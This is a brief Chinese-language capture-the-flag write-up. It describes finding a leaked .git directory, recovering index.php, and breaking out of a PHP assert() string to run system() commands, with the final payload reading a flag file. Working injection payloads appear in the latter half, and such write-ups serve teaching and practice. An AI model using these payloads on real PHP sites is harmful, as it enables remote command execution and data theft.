这题也挺有想法 第一次确实没有想到

首先我们可以扫出 git

然后

我们githack 泄露一下

然后我们看index.php代码

<?phpif (isset($_GET['page'])) {$page = $_GET['page'];
} else {$page = "home";
}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

问题代码出现在

assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");这里的参数是可以闭合的 因为是可控的我们构造 ')assert("strpos('')', '..') === false") or die("Detected hacking attempt!");然后我们可以在后面面接上其他php语句这里有两个').system("ls");//或者') or system("ls");//

最后payload

就是替换为cat即可

/?page=').system("cat ./templates/flag.php");//